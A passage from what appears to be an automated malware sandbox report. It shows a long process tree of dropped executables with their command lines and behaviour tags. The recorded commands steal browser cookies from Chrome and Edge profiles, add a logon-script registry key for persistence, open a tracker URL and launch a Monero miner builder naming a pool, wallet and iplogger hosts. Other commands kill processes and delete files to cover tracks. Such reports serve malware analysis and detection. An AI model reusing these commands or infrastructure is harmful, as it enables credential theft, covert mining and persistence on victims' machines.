                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4516
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 888
                                                                  3⤵
                                                                  • Program crash
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4872
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1136
                                                                  3⤵
                                                                  • Program crash
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3048
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1148
                                                                  3⤵
                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                  • Program crash
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5324
                                                              • C:\Users\Admin\Documents\ogJH18NdGQ8nMLzUf8XZFbQl.exe
                                                                "C:\Users\Admin\Documents\ogJH18NdGQ8nMLzUf8XZFbQl.exe"
                                                                2⤵
                                                                  PID:4328
                                                                • C:\Users\Admin\Documents\ihar12fqdZjlFuD9wMggUGlV.exe
                                                                  "C:\Users\Admin\Documents\ihar12fqdZjlFuD9wMggUGlV.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4284
                                                                  • C:\Users\Admin\AppData\Roaming\8752555.exe
                                                                    "C:\Users\Admin\AppData\Roaming\8752555.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4740
                                                                  • C:\Users\Admin\AppData\Roaming\6999093.exe
                                                                    "C:\Users\Admin\AppData\Roaming\6999093.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    PID:412
                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      PID:2864
                                                                  • C:\Users\Admin\AppData\Roaming\3152080.exe
                                                                    "C:\Users\Admin\AppData\Roaming\3152080.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:5132
                                                                  • C:\Users\Admin\AppData\Roaming\1982896.exe
                                                                    "C:\Users\Admin\AppData\Roaming\1982896.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:5200
                                                                • C:\Users\Admin\Documents\gd41tbyNVJg_wutYjqKRVTTH.exe
                                                                  "C:\Users\Admin\Documents\gd41tbyNVJg_wutYjqKRVTTH.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Checks BIOS information in registry
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4232
                                                                • C:\Users\Admin\Documents\Ed3Gclrtkl1Ek85dcxCUI1m8.exe
                                                                  "C:\Users\Admin\Documents\Ed3Gclrtkl1Ek85dcxCUI1m8.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  PID:1784
                                                                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4880
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      PID:5284
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      4⤵
                                                                        PID:6068
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        4⤵
                                                                          PID:4852
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          4⤵
                                                                            PID:1448
                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                          "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                          3⤵
                                                                            PID:4580
                                                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                            "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:4768
                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              4⤵
                                                                                PID:5844
                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:768
                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                PID:6252
                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                PID:6764
                                                                              • C:\Windows\system32\WerFault.exe
                                                                                C:\Windows\system32\WerFault.exe -u -p 4768 -s 1520
                                                                                4⤵
                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                • Program crash
                                                                                PID:6216
                                                                          • C:\Users\Admin\Documents\UYrkctL2OQTKGwhtF04YGAOe.exe
                                                                            "C:\Users\Admin\Documents\UYrkctL2OQTKGwhtF04YGAOe.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Checks BIOS information in registry
                                                                            • Checks whether UAC is enabled
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3024
                                                                          • C:\Users\Admin\Documents\kXeyg8P_Y4lYzOSnJKBRTXzH.exe
                                                                            "C:\Users\Admin\Documents\kXeyg8P_Y4lYzOSnJKBRTXzH.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2352
                                                                          • C:\Users\Admin\Documents\HkRtqjAALeZZsV5jIKhG3Ubr.exe
                                                                            "C:\Users\Admin\Documents\HkRtqjAALeZZsV5jIKhG3Ubr.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            PID:5456
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-2DF2U.tmp\HkRtqjAALeZZsV5jIKhG3Ubr.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-2DF2U.tmp\HkRtqjAALeZZsV5jIKhG3Ubr.tmp" /SL5="$30234,138429,56832,C:\Users\Admin\Documents\HkRtqjAALeZZsV5jIKhG3Ubr.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:5548
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-BUSTG.tmp\Setup.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-BUSTG.tmp\Setup.exe" /Verysilent
                                                                                4⤵
                                                                                  PID:6632
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks processor information in registry
                                                                                    PID:6832
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im runvd.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe" & del C:\ProgramData\*.dll & exit
                                                                                      6⤵
                                                                                        PID:3824
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /im runvd.exe /f
                                                                                          7⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:7628
                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                          timeout /t 6
                                                                                          7⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:8660
                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:6860
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-R7N5E.tmp\WEATHER Manager.tmp
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-R7N5E.tmp\WEATHER Manager.tmp" /SL5="$103D8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                        6⤵
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        PID:7112
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-2E1FF.tmp\Setup.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-2E1FF.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                          7⤵
                                                                                          • Loads dropped DLL
                                                                                          • Enumerates connected drives
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          PID:5108
                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-2E1FF.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-2E1FF.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629480191 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                            8⤵
                                                                                              PID:9176
                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Enumerates connected drives
                                                                                        • Modifies system certificate store
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        PID:6848
                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629480191 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                          6⤵
                                                                                            PID:6796
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6840
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-DKUQ0.tmp\Inlog.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-DKUQ0.tmp\Inlog.tmp" /SL5="$103D2,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                            6⤵
                                                                                            • Loads dropped DLL
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            PID:7040
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-IG5JF.tmp\Setup.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-IG5JF.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                              7⤵
                                                                                                PID:7728
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-FSUHV.tmp\Setup.tmp
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-FSUHV.tmp\Setup.tmp" /SL5="$105EE,17367683,721408,C:\Users\Admin\AppData\Local\Temp\is-IG5JF.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                  8⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Drops file in Program Files directory
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  PID:7464
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-SC8Q0.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                    9⤵
                                                                                                      PID:2188
                                                                                                      • C:\Windows\SysWOW64\expand.exe
                                                                                                        expand C:\Users\Admin\AppData\Local\Temp\is-SC8Q0.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                        10⤵
                                                                                                          PID:5960
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                        9⤵
                                                                                                          PID:5584
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                            10⤵
                                                                                                              PID:356
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                            9⤵
                                                                                                            • Checks computer location settings
                                                                                                            PID:7844
                                                                                                          • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                            "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                            9⤵
                                                                                                              PID:1788
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-SC8Q0.tmp\{app}\vdi_compiler.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-SC8Q0.tmp\{app}\vdi_compiler"
                                                                                                              9⤵
                                                                                                                PID:2200
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-SC8Q0.tmp\{app}\vdi_compiler.exe"
                                                                                                                  10⤵
                                                                                                                    PID:8164
                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                      ping localhost -n 4
                                                                                                                      11⤵
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:5960
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:6820
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-UEMM7.tmp\Stats.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-UEMM7.tmp\Stats.tmp" /SL5="$103C6,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                                                            6⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            PID:7048
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-TF9U8.tmp\builder.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-TF9U8.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                                                              7⤵
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5224
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:6900
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-NSFCK.tmp\VPN.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-NSFCK.tmp\VPN.tmp" /SL5="$103E4,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                            6⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            PID:2068
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-IG5JG.tmp\Setup.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-IG5JG.tmp\Setup.exe" /silent /subid=720
                                                                                                              7⤵
                                                                                                                PID:7576
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-HSNBC.tmp\Setup.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-HSNBC.tmp\Setup.tmp" /SL5="$302BE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-IG5JG.tmp\Setup.exe" /silent /subid=720
                                                                                                                  8⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  • Modifies system certificate store
                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                  PID:7660
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                    9⤵
                                                                                                                      PID:4860
                                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                        tapinstall.exe remove tap0901
                                                                                                                        10⤵
                                                                                                                          PID:9036
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                        9⤵
                                                                                                                          PID:7544
                                                                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                            tapinstall.exe install OemVista.inf tap0901
                                                                                                                            10⤵
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • Drops file in Windows directory
                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                            PID:8904
                                                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                          9⤵
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          PID:7944
                                                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                          9⤵
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          PID:8756
                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:6940
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                    6⤵
                                                                                                                      PID:5348
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                        7⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:7444
                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                    5⤵
                                                                                                                      PID:6988
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-EQSAE.tmp\MediaBurner2.tmp
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-EQSAE.tmp\MediaBurner2.tmp" /SL5="$C005E,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                        6⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:6156
                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                      5⤵
                                                                                                                        PID:7020
                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                          6⤵
                                                                                                                            PID:6680
                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                          5⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          PID:7092
                                                                                                                          • C:\Users\Admin\Documents\aUfLmom0BKaVeeyivPlm65hL.exe
                                                                                                                            "C:\Users\Admin\Documents\aUfLmom0BKaVeeyivPlm65hL.exe"
                                                                                                                            6⤵
                                                                                                                              PID:7928
                                                                                                                              • C:\Users\Admin\Documents\aUfLmom0BKaVeeyivPlm65hL.exe
                                                                                                                                "C:\Users\Admin\Documents\aUfLmom0BKaVeeyivPlm65hL.exe"
                                                                                                                                7⤵
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                PID:7300
                                                                                                                            • C:\Users\Admin\Documents\3zbtCIqjlR2JyAQgAiR9Bfp3.exe
                                                                                                                              "C:\Users\Admin\Documents\3zbtCIqjlR2JyAQgAiR9Bfp3.exe"
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:6068
                                                                                                                              • C:\Users\Admin\Documents\3zbtCIqjlR2JyAQgAiR9Bfp3.exe
                                                                                                                                "C:\Users\Admin\Documents\3zbtCIqjlR2JyAQgAiR9Bfp3.exe"
                                                                                                                                7⤵
                                                                                                                                  PID:6936
                                                                                                                                • C:\Users\Admin\Documents\3zbtCIqjlR2JyAQgAiR9Bfp3.exe
                                                                                                                                  "C:\Users\Admin\Documents\3zbtCIqjlR2JyAQgAiR9Bfp3.exe"
                                                                                                                                  7⤵
                                                                                                                                    PID:7400
                                                                                                                                • C:\Users\Admin\Documents\0KNlz2b56McaeFMI9qgdjsNm.exe
                                                                                                                                  "C:\Users\Admin\Documents\0KNlz2b56McaeFMI9qgdjsNm.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:7920
                                                                                                                                    • C:\Users\Admin\Documents\0KNlz2b56McaeFMI9qgdjsNm.exe
                                                                                                                                      "C:\Users\Admin\Documents\0KNlz2b56McaeFMI9qgdjsNm.exe" -q
                                                                                                                                      7⤵
                                                                                                                                        PID:7044
                                                                                                                                    • C:\Users\Admin\Documents\uwz6ZUHSCyxltV2IgG5A08cq.exe
                                                                                                                                      "C:\Users\Admin\Documents\uwz6ZUHSCyxltV2IgG5A08cq.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                      PID:7912
                                                                                                                                    • C:\Users\Admin\Documents\sTQ4wwD4xnoOY9cBpfJye4ev.exe
                                                                                                                                      "C:\Users\Admin\Documents\sTQ4wwD4xnoOY9cBpfJye4ev.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:7904
                                                                                                                                      • C:\Users\Admin\Documents\sTQ4wwD4xnoOY9cBpfJye4ev.exe
                                                                                                                                        "C:\Users\Admin\Documents\sTQ4wwD4xnoOY9cBpfJye4ev.exe"
                                                                                                                                        7⤵
                                                                                                                                          PID:4856
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            8⤵
                                                                                                                                              PID:188
                                                                                                                                          • C:\Users\Admin\Documents\sTQ4wwD4xnoOY9cBpfJye4ev.exe
                                                                                                                                            "C:\Users\Admin\Documents\sTQ4wwD4xnoOY9cBpfJye4ev.exe"
                                                                                                                                            7⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                            PID:4580
                                                                                                                                        • C:\Users\Admin\Documents\e1W05Eh1K4Hnv6J57kp48dKP.exe
                                                                                                                                          "C:\Users\Admin\Documents\e1W05Eh1K4Hnv6J57kp48dKP.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:7896
                                                                                                                                          • C:\Users\Admin\Documents\fBw0zsDv7ZMhhLbl3s7mh922.exe
                                                                                                                                            "C:\Users\Admin\Documents\fBw0zsDv7ZMhhLbl3s7mh922.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                            PID:7888
                                                                                                                                            • C:\Users\Admin\Documents\fBw0zsDv7ZMhhLbl3s7mh922.exe
                                                                                                                                              C:\Users\Admin\Documents\fBw0zsDv7ZMhhLbl3s7mh922.exe
                                                                                                                                              7⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:7636
                                                                                                                                          • C:\Users\Admin\Documents\z_2AVIJubAUUzMFS5oc3DeGV.exe
                                                                                                                                            "C:\Users\Admin\Documents\z_2AVIJubAUUzMFS5oc3DeGV.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:7880
                                                                                                                                            • C:\Users\Admin\Documents\OYcYTRbEyCqWPj6MVb0o7XTq.exe
                                                                                                                                              "C:\Users\Admin\Documents\OYcYTRbEyCqWPj6MVb0o7XTq.exe"
                                                                                                                                              6⤵
                                                                                                                                                PID:7872
                                                                                                                                              • C:\Users\Admin\Documents\erHF7ALEexVo6HS5mSuw0Zii.exe
                                                                                                                                                "C:\Users\Admin\Documents\erHF7ALEexVo6HS5mSuw0Zii.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                PID:7864
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im erHF7ALEexVo6HS5mSuw0Zii.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\erHF7ALEexVo6HS5mSuw0Zii.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                  7⤵
                                                                                                                                                    PID:7124
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /im erHF7ALEexVo6HS5mSuw0Zii.exe /f
                                                                                                                                                      8⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:8820
                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                      timeout /t 6
                                                                                                                                                      8⤵
                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                      PID:2996
                                                                                                                                                • C:\Users\Admin\Documents\_H5MoL5VSBNEH9NRXvWm65wi.exe
